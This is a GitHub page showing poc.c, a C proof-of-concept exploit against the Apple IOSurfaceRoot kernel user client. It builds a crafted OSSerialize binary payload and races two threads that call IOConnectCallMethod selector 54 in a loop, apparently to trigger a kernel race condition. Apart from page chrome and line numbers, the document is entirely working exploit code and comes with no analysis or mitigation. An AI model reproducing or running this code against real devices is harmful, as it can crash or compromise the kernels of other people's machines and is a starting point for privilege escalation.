-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathpoc.c
104 lines (74 loc) · 2.05 KB
/
poc.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#include <stdio.h>
#include <pthread.h>
#include <IOKit/IOKitLib.h>
enum
{
kOSSerializeDictionary = 0x01000000U,
kOSSerializeArray = 0x02000000U,
kOSSerializeSet = 0x03000000U,
kOSSerializeNumber = 0x04000000U,
kOSSerializeSymbol = 0x08000000U,
kOSSerializeString = 0x09000000U,
kOSSerializeData = 0x0a000000U,
kOSSerializeBoolean = 0x0b000000U,
kOSSerializeObject = 0x0c000000U,
kOSSerializeTypeMask = 0x7F000000U,
kOSSerializeDataMask = 0x00FFFFFFU,
kOSSerializeEndCollecton = 0x80000000U,
kOSSerializeBinarySignature = 0x000000d3,
};
io_connect_t glob_conn = 0;
char *inStr = 0;
size_t len = 0;
void *race1() {
if(!inStr || !len || !glob_conn) {
printf("Malformed req!\n");
return NULL;
}
while(1) {
IOConnectCallMethod(glob_conn,54,0,0,inStr,len,0,0,0,0);
}
return NULL;
}
void *race2() {
if(!inStr || !len || !glob_conn) {
printf("Malformed req!\n");
return NULL;
}
while(1) {
IOConnectCallMethod(glob_conn,54,0,0,inStr,len,0,0,0,0);
}
return NULL;
}
int main() {
io_service_t surface = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching("IOSurfaceRoot"));
if(!surface) {
printf("IOKit obj doesn't exist???\n");
return 2;
}
io_connect_t conn;
kern_return_t kr = IOServiceOpen(surface,mach_task_self(),0,&conn);
if(kr != KERN_SUCCESS) {
printf("Failed to open userclient!\n");
return 3;
}
glob_conn = conn;
printf("Opened userclient!\n");
uint32_t dict[] = {
kOSSerializeBinarySignature,
kOSSerializeArray | kOSSerializeEndCollecton | 1,
kOSSerializeSymbol | 4 | kOSSerializeEndCollecton,
0x00414141
};
char *buf = malloc(sizeof(dict) + 12);
memcpy(buf+12, &dict, sizeof(dict));
inStr = buf;
len = sizeof(dict)+12;
pthread_t th1;
pthread_t th2;
pthread_create(&th1,0,race1,0);
pthread_create(&th2,0,race2,0);
pthread_join(th1,0);
pthread_join(th2,0);
return 0;
}